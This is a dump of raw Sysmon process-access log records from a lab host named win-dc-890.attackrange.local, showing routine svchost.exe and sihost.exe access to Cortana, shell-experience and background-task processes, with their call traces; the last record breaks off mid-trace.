 10341000x80000000000000001054625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.728{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.727{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.726{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.726{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.726{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\S
ystem32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001054608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:41.093{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F84C-60EB-EF7D-00000000CF01}7836C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C